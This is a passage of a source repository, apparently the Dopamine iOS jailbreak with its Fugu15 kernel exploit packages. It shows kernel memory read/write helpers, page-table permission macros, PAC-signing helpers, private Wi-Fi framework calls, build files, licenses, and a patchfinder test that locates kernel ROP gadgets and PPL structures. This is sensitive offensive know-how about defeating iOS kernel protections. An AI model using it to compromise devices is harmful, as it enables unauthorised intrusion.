kwrite32(curAddr, toWrite); 50 | } 51 | } 52 | 53 | uint16_t kread16(uint64_t kaddr) 54 | { 55 | uint16_t outBuf; 56 | kreadbuf(kaddr, &outBuf, sizeof(uint16_t)); 57 | return outBuf; 58 | } 59 | 60 | uint8_t kread8(uint64_t kaddr) 61 | { 62 | uint8_t outBuf; 63 | kreadbuf(kaddr, &outBuf, sizeof(uint8_t)); 64 | return outBuf; 65 | } 66 | 67 | void kwrite16(uint64_t kaddr, uint16_t val) 68 | { 69 | kwritebuf(kaddr, &val, sizeof(uint16_t)); 70 | } 71 | 72 | void kwrite8(uint64_t kaddr, uint8_t val) 73 | { 74 | kwritebuf(kaddr, &val, sizeof(uint8_t)); 75 | } 76 | 77 | uint64_t kread_ptr(uint64_t kaddr) { 78 | uint64_t ptr = kread64(kaddr); 79 | if ((ptr >> 55) & 1) { 80 | return ptr | 0xFFFFFF8000000000; 81 | } 82 | 83 | return ptr; 84 | } 85 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/virtrw.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | uint64_t (^kread64)(uint64_t kaddr); 6 | uint32_t (^kread32)(uint64_t kaddr); 7 | 8 | void (^kwrite64)(uint64_t kaddr, uint64_t val); 9 | void (^kwrite32)(uint64_t kaddr, uint32_t val); 10 | 11 | void kreadbuf(uint64_t kaddr, void* output, size_t size); 12 | void kwritebuf(uint64_t kaddr, void* input, size_t size); 13 | 14 | uint16_t kread16(uint64_t kaddr); 15 | uint8_t kread8(uint64_t kaddr); 16 | 17 | void kwrite16(uint64_t kaddr, uint16_t val); 18 | void kwrite8(uint64_t kaddr, uint8_t val); 19 | 20 | uint64_t kread_ptr(uint64_t kaddr); 21 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/xprr.h: -------------------------------------------------------------------------------- 1 | // 2 | // xprr.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef xprr_h 10 | #define xprr_h 11 | 12 | #define PTE_TO_PERM(pte) ((((pte) >> 4ULL) & 0xC) | (((pte) >> 52ULL) & 2) | (((pte) >> 54ULL) & 1)) 13 | #define _PERM_TO_PTE(perm) ((((perm) & 0xC) << 4ULL) | (((perm) & 2) << 52ULL) | (((perm) & 1) << 54ULL)) 14 | #define PERM_TO_PTE(perm) _PERM_TO_PTE((uint64_t) (perm)) 15 | 16 | #define PERM_KRW_URW 0x7 // R/W for kernel and user 17 | 18 | #define PTE_NON_GLOBAL (1ULL << 11ULL) 19 | #define PTE_VALID (1ULL << 10ULL) // Access flag 20 | #define PTE_OUTER_SHAREABLE (2ULL << 8ULL) 21 | #define PTE_INNER_SHAREABLE (3ULL << 8ULL) 22 | 23 | #define PTE_LEVEL3_ENTRY (PTE_VALID | 0x3ULL) 24 | 25 | #endif /* xprr_h */ 26 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Lars Fröder (opa334) 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /LICENSE_Fugu15.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Pinauten GmbH 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | 2 | all %: 3 | @./BaseBin/pack.sh 4 | @xattr -rc Tools >/dev/null 2>&1 5 | $(MAKE) -C Exploits/oobPCI $@ 6 | $(MAKE) -C Dopamine $@ 7 | 8 | clean: 9 | @./BaseBin/clean.sh 10 | 11 | update: all 12 | @./jbupdate.sh 13 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 7 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 7 | "state": { 8 | "branch": "master", 9 | "revision": "7bcffb07259191f7103ded3d29c77f05b7fed396", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "Fugu15KernelExploit", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .library( 15 | name: "Fugu15KernelExploit", 16 | targets: ["Fugu15KernelExploit"]) 17 | ], 18 | dependencies: [ 19 | .package(url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 20 | .package(path: "../ProcessCommunication"), 21 | .package(path: "../PatchfinderUtils"), 22 | .package(path: "../KernelPatchfinder"), 23 | ], 24 | targets: [ 25 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 26 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 27 | .target(name: "CBindings"), 28 | .target( 29 | name: "Fugu15KernelExploit", 30 | dependencies: ["CBindings", "SwiftUtils", "ProcessCommunication", "PatchfinderUtils", "KernelPatchfinder"]), 31 | ] 32 | ) 33 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/README.md: -------------------------------------------------------------------------------- 1 | # Fugu15KernelExploit 2 | 3 | This package can be used to easily launch the Fugu15 kernel exploit and use it's capabilities. 4 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/CBindings.h: -------------------------------------------------------------------------------- 1 | // 2 | // CBindings.h 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef CBindings_h 10 | #define CBindings_h 11 | 12 | #include 13 | #include 14 | #import 15 | #include 16 | 17 | #include "posix_spawn.h" 18 | #include "th_state.h" 19 | #include "libjailbreak.h" 20 | #include "wifi.h" 21 | 22 | extern int decompress_tar_zstd(const char* src_file_path, const char* dst_file_path); 23 | extern int loadEmbeddedSignature(NSString* filePath); 24 | uint64_t getPCIMemorySize(void); 25 | //NSString *getBootManifestHash(void); 26 | 27 | // Also define some IOKit stuff... 28 | extern const mach_port_t kIOMainPortDefault; 29 | 30 | extern mach_port_t IORegistryEntryFromPath(mach_port_t mainPort, const io_string_t __nonnull path); 31 | extern CFTypeRef __nonnull IORegistryEntryCreateCFProperty(mach_port_t entry, CFStringRef __nonnull key, CFAllocatorRef __nullable allocator, uint32_t options); 32 | extern kern_return_t IOObjectRelease(mach_port_t object); 33 | 34 | extern uint64_t reboot3(uint64_t how, uint64_t unk); 35 | 36 | #endif /* CBindings_h */ 37 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/th_state.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2006, 2008 Apple,Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. Please obtain a copy of the License at 10 | * http://www.opensource.apple.com/apsl/ and read it before using this 11 | * file. 12 | * 13 | * The Original Code and all software distributed under the License are 14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 18 | * Please see the License for the specific language governing rights and 19 | * limitations under the License. 20 | * 21 | * @APPLE_LICENSE_HEADER_END@ 22 | */ 23 | 24 | #ifndef TH_STATE_H_ 25 | #define TH_STATE_H_ 26 | 27 | #include 28 | #include 29 | 30 | #ifdef __arm64__ 31 | 32 | uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts); 33 | void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc); 34 | uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts); 35 | void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr); 36 | 37 | #endif /* defined __arm64__ */ 38 | 39 | struct exception_message_reply { 40 | mach_msg_header_t hdr; 41 | NDR_record_t NDR; 42 | kern_return_t result; 43 | }; 44 | 45 | #endif /* !defined TH_STATE_H_ */ 46 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/wifi.h: -------------------------------------------------------------------------------- 1 | bool wifiIsEnabled(void); 2 | void setWifiEnabled(bool enabled); -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/pci_offset.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | 5 | uint64_t getPCIMemorySize(void) 6 | { 7 | uint64_t pciMemorySize = 0; 8 | 9 | io_iterator_t iterator; 10 | kern_return_t kr; 11 | 12 | kr = IOServiceGetMatchingServices(kIOMainPortDefault, IOServiceMatching("IOPCIDevice"), &iterator); 13 | if (kr != KERN_SUCCESS) { 14 | printf("Error finding IOPCIDevice: %x\n", kr); 15 | return 0; 16 | } 17 | 18 | io_service_t service = IOIteratorNext(iterator); 19 | while (service) { 20 | io_name_t name; 21 | kr = IORegistryEntryGetName(service, name); 22 | if (kr == KERN_SUCCESS) { 23 | if(strcmp(name, "wlan") == 0) { 24 | CFMutableDictionaryRef properties; 25 | kr = IORegistryEntryCreateCFProperties(service, &properties, kCFAllocatorDefault, kNilOptions); 26 | if (kr == KERN_SUCCESS) { 27 | CFTypeRef memory = CFDictionaryGetValue(properties, CFSTR("IODeviceMemory")); 28 | if (CFGetTypeID(memory) == CFArrayGetTypeID()) 29 | { 30 | NSArray* array = (__bridge id)memory; 31 | NSArray* fArray = array.firstObject; 32 | NSNumber* size = fArray.firstObject[@"length"]; 33 | pciMemorySize = [size unsignedLongLongValue]; 34 | } 35 | CFRelease(properties); 36 | } 37 | } 38 | } 39 | IOObjectRelease(service); 40 | service = IOIteratorNext(iterator); 41 | } 42 | IOObjectRelease(iterator); 43 | 44 | return pciMemorySize; 45 | } 46 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/th_state.c: -------------------------------------------------------------------------------- 1 | // 2 | // th_state.h 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | 12 | #ifdef __arm64__ 13 | 14 | #include 15 | 16 | uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts) { 17 | return arm_thread_state64_get_pc(*ts); 18 | } 19 | 20 | void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc) { 21 | void *ptr = ptrauth_sign_unauthenticated((void*)pc, ptrauth_key_function_pointer, 0); 22 | arm_thread_state64_set_pc_fptr(*ts, ptr); 23 | } 24 | 25 | uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts) { 26 | return arm_thread_state64_get_lr(*ts); 27 | } 28 | 29 | void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr) { 30 | void *ptr = ptrauth_sign_unauthenticated((void*)lr, ptrauth_key_function_pointer, 0); 31 | arm_thread_state64_set_lr_fptr(*ts, ptr); 32 | } 33 | 34 | #endif /* defined __arm64__ */ 35 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/wifi.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | 4 | void *wifiManager = NULL; 5 | void *(*WiFiManagerClientCreate)(CFAllocatorRef allocator, int flags); 6 | CFPropertyListRef (*WiFiManagerClientCopyProperty)(void *manager, CFStringRef property); 7 | void (*WiFiManagerClientSetProperty)(void *manager, CFStringRef property, CFPropertyListRef value); 8 | 9 | void loadWifiManager(void) 10 | { 11 | static dispatch_once_t onceToken; 12 | dispatch_once (&onceToken, ^{ 13 | void *wifiHandle = dlopen("/System/Library/PrivateFrameworks/MobileWiFi.framework/MobileWiFi", RTLD_NOW); 14 | WiFiManagerClientCreate = dlsym(wifiHandle, "WiFiManagerClientCreate"); 15 | WiFiManagerClientCopyProperty = dlsym(wifiHandle, "WiFiManagerClientCopyProperty"); 16 | WiFiManagerClientSetProperty = dlsym(wifiHandle, "WiFiManagerClientSetProperty"); 17 | wifiManager = WiFiManagerClientCreate(kCFAllocatorDefault, 0); 18 | }); 19 | } 20 | 21 | bool wifiIsEnabled(void) 22 | { 23 | loadWifiManager(); 24 | 25 | CFBooleanRef isEnabled = WiFiManagerClientCopyProperty(wifiManager, CFSTR("AllowEnable")); 26 | bool isEnabledBool = false; 27 | if (isEnabled) { 28 | isEnabledBool = CFBooleanGetValue(isEnabled); 29 | CFRelease(isEnabled); 30 | } 31 | return isEnabledBool; 32 | } 33 | 34 | void setWifiEnabled(bool enabled) 35 | { 36 | loadWifiManager(); 37 | 38 | WiFiManagerClientSetProperty(wifiManager, CFSTR("AllowEnable"), enabled ? kCFBooleanTrue : kCFBooleanFalse); 39 | } 40 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/XPC.apinotes: -------------------------------------------------------------------------------- 1 | Name: XPC 2 | Functions: 3 | # xpc_object 4 | - Name: xpc_retain 5 | Availability: nonswift 6 | - Name: xpc_release 7 | Availability: nonswift 8 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/debug.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_DEBUG_H__ 2 | #define __XPC_DEBUG_H__ 3 | 4 | /*! 5 | * @function xpc_debugger_api_misuse_info 6 | * Returns a pointer to a string describing the reason XPC aborted the calling 7 | * process. On OS X, this will be the same string present in the "Application 8 | * Specific Information" section of the crash report. 9 | * 10 | * @result 11 | * A pointer to the human-readable string describing the reason the caller was 12 | * aborted. If XPC was not responsible for the program's termination, NULL will 13 | * be returned. 14 | * 15 | * @discussion 16 | * This function is only callable from within a debugger. It is not meant to be 17 | * called by the program directly. 18 | */ 19 | XPC_DEBUGGER_EXCL 20 | const char * 21 | xpc_debugger_api_misuse_info(void); 22 | 23 | #endif // __XPC_DEBUG_H__ 24 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/endpoint.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_ENDPOINT_H__ 2 | #define __XPC_ENDPOINT_H__ 3 | 4 | /*! 5 | * @function xpc_endpoint_create 6 | * Creates a new endpoint from a connection that is suitable for embedding into 7 | * messages. 8 | * 9 | * @param connection 10 | * Only connections obtained through calls to xpc_connection_create*() may be 11 | * given to this API. Passing any other type of connection is not supported and 12 | * will result in undefined behavior. 13 | * 14 | * @result 15 | * A new endpoint object. 16 | */ 17 | __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) 18 | XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 19 | xpc_endpoint_t _Nonnull 20 | xpc_endpoint_create(xpc_connection_t _Nonnull connection); 21 | 22 | #endif // __XPC_ENDPOINT_H__ 23 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/module.modulemap: -------------------------------------------------------------------------------- 1 | module XPC [system] [extern_c] { 2 | header "xpc.h" 3 | header "availability.h" 4 | header "base.h" 5 | header "activity.h" 6 | header "connection.h" 7 | header "debug.h" 8 | header "endpoint.h" 9 | export * 10 | } 11 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/Fugu15KernelExploit/Logger.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Logger.swift 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2021/2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | import Foundation 10 | 11 | class Logger { 12 | static var logFileHandle: FileHandle? 13 | 14 | static func print(_ s: String) { 15 | NSLog("Logger: %@", s) 16 | 17 | if logFileHandle != nil { 18 | try? logFileHandle.unsafelyUnwrapped.write(contentsOf: (s + "\n").data(using: .utf8) ?? Data()) 19 | } 20 | } 21 | 22 | static func fmt(_ s: String, _ args: CVarArg...) { 23 | print(String(format: s, arguments: args)) 24 | } 25 | 26 | static func status(_ s: String) { 27 | print("Status: \(s)") 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /Packages/KernelPatchfinder/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/ 7 | /Package.resolved 8 | -------------------------------------------------------------------------------- /Packages/KernelPatchfinder/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Pinauten GmbH 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Packages/KernelPatchfinder/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.3 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "KernelPatchfinder", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .library( 15 | name: "KernelPatchfinder", 16 | targets: ["KernelPatchfinder"]), 17 | .executable(name: "KernelPatchfinderTester", targets: ["KernelPatchfinderTester"]) 18 | ], 19 | dependencies: [ 20 | // Dependencies declare other packages that this package depends on. 21 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 22 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")), 23 | .package(name: "PatchfinderUtils", url: "https://github.com/pinauten/PatchfinderUtils", .branch("master")) 24 | ], 25 | targets: [ 26 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 27 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 28 | .target( 29 | name: "KernelPatchfinder", 30 | dependencies: ["SwiftUtils", "SwiftMachO", "PatchfinderUtils"]), 31 | .testTarget( 32 | name: "KernelPatchfinderTests", 33 | dependencies: ["KernelPatchfinder"]), 34 | .target( 35 | name: "KernelPatchfinderTester", 36 | dependencies: ["SwiftUtils", "SwiftMachO", "KernelPatchfinder"]), 37 | ] 38 | ) 39 | -------------------------------------------------------------------------------- /Packages/KernelPatchfinder/README.md: -------------------------------------------------------------------------------- 1 | # KernelPatchfinder 2 | 3 | An iOS Kernel Patchfinder, supporting iOS 15. Used by [Fugu15](https://github.com/pinauten/Fugu15). 4 | -------------------------------------------------------------------------------- /Packages/KernelPatchfinder/Tests/KernelPatchfinderTests/KernelPatchfinderTests.swift: -------------------------------------------------------------------------------- 1 | // 2 | // KernelPatchfinderTests.swift 3 | // KernelPatchfinder 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | import XCTest 10 | @testable import KernelPatchfinder 11 | import SwiftMachO 12 | import PatchfinderUtils 13 | 14 | final class KernelPatchfinderTests: XCTestCase { 15 | func testPatchfinder() throws { 16 | /*guard let pf = KernelPatchfinder.running else { 17 | XCTFail("KernelPatchfinder.running == nil!") 18 | return 19 | }*/ 20 | 21 | // /Users/linus/kernelcache.release.iphone11.raw 22 | // /Users/linus/Desktop/Fugu15_OBTS/Server/kernelcache.release.iphone14.raw 23 | guard let pf = KernelPatchfinder(kernel: try! MachO(fromFile: "/Users/linus/kernelcache.release.iphone11.raw", okToLoadFAT: false)) else { 24 | XCTFail("KernelPatchfinder.running == nil!") 25 | return 26 | } 27 | 28 | XCTAssertNotNil(pf.allproc) 29 | XCTAssertNotNil(pf.cpu_ttep) 30 | XCTAssertNotNil(pf.pmap_enter_options_addr) 31 | XCTAssertNotNil(pf.hw_lck_ticket_reserve_orig_allow_invalid_signed) 32 | XCTAssertNotNil(pf.hw_lck_ticket_reserve_orig_allow_invalid) 33 | XCTAssertNotNil(pf.br_x22_gadget) 34 | XCTAssertNotNil(pf.exception_return) 35 | XCTAssertNotNil(pf.ldp_x0_x1_x8_gadget) 36 | XCTAssertNotNil(pf.exception_return_after_check) 37 | XCTAssertNotNil(pf.exception_return_after_check_no_restore) 38 | XCTAssertNotNil(pf.str_x8_x9_gadget) 39 | XCTAssertNotNil(pf.str_x0_x19_ldr_x20) 40 | XCTAssertNotNil(pf.pmap_set_nested) 41 | XCTAssertNotNil(pf.pmap_nest) 42 | XCTAssertNotNil(pf.pmap_remove_options) 43 | XCTAssertNotNil(pf.pmap_mark_page_as_ppl_page) 44 | XCTAssertNotNil(pf.pmap_create_options) 45 | XCTAssertNotNil(pf.gIOCatalogue) 46 | XCTAssertNotNil(pf.terminateDriversForModule) 47 | XCTAssertNotNil(pf.kalloc_data_external) 48 | XCTAssertNotNil(pf.ml_sign_thread_state) 49 | XCTAssertNotNil(pf.ppl_handler_table) 50 | XCTAssertNotNil(pf.pmap_image4_trust_caches) 51 | XCTAssertNotNil(pf.kernel_el) 52 | XCTAssertNotNil(pf.TH_RECOVER) 53 | XCTAssertNotNil(pf.TH_KSTACKPTR) 54 | XCTAssertNotNil(pf.ACT_CONTEXT) 55 | XCTAssertNotNil(pf.ACT_CPUDATAP) 56 | XCTAssertNotNil(pf.ITK_SPACE) 57 | XCTAssertNotNil(pf.VM_MAP_PMAP) 58 | XCTAssertNotNil(pf.PORT_LABEL) 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /Packages/PatchfinderUtils/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/ 7 | /Package.resolved 8 | -------------------------------------------------------------------------------- /Packages/PatchfinderUtils/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021/2022 Pinauten GmbH 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Packages/PatchfinderUtils/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.3 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "PatchfinderUtils", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .library( 15 | name: "PatchfinderUtils", 16 | targets: ["PatchfinderUtils"]), 17 | ], 18 | dependencies: [ 19 | // Dependencies declare other packages that this package depends on. 20 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 21 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 22 | ], 23 | targets: [ 24 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 25 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 26 | .target(name: "CFastFind"), 27 | .target( 28 | name: "PatchfinderUtils", 29 | dependencies: ["CFastFind", "SwiftUtils", "SwiftMachO"]), 30 | ] 31 | ) 32 | -------------------------------------------------------------------------------- /Packages/PatchfinderUtils/README.md: -------------------------------------------------------------------------------- 1 | # PatchfinderUtils 2 | 3 | Utilities for patchfinding. 4 | -------------------------------------------------------------------------------- /Packages/PatchfinderUtils/Sources/CFastFind/include/CFastFind.h: -------------------------------------------------------------------------------- 1 | // 2 | // CFastFind.h 3 | // CFastFind 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2021/2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef CFastFind_h 10 | #define CFastFind_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | bool CFastFind(const void* __nonnull buffer, size_t bufLen, const uint32_t* __nonnull insts, size_t instLen, size_t* __nonnull offset); 18 | 19 | uint64_t aarch64_emulate_adr(uint32_t instruction, uint64_t pc); 20 | uint64_t aarch64_emulate_branch(uint32_t instruction, uint64_t pc); 21 | uint64_t aarch64_emulate_b(uint32_t instr, uint64_t pc); 22 | uint64_t aarch64_emulate_bl(uint32_t instr, uint64_t pc); 23 | uint64_t aarch64_emulate_compare_branch(uint32_t instruction, uint64_t pc); 24 | uint64_t aarch64_emulate_conditional_branch(uint32_t instruction, uint64_t pc); 25 | uint64_t aarch64_emulate_adrp(uint32_t instruction, uint64_t pc); 26 | bool aarch64_emulate_add_imm(uint32_t instruction, uint32_t * __nonnull dst, uint32_t * __nonnull src, uint32_t * __nonnull imm); 27 | uint64_t aarch64_emulate_adrp_add(uint32_t instruction, uint32_t addInstruction, uint64_t pc); 28 | uint64_t aarch64_emulate_adrp_ldr(uint32_t instruction, uint32_t ldrInstruction, uint64_t pc); 29 | uint64_t aarch64_emulate_ldr(uint32_t ldrInstruction, 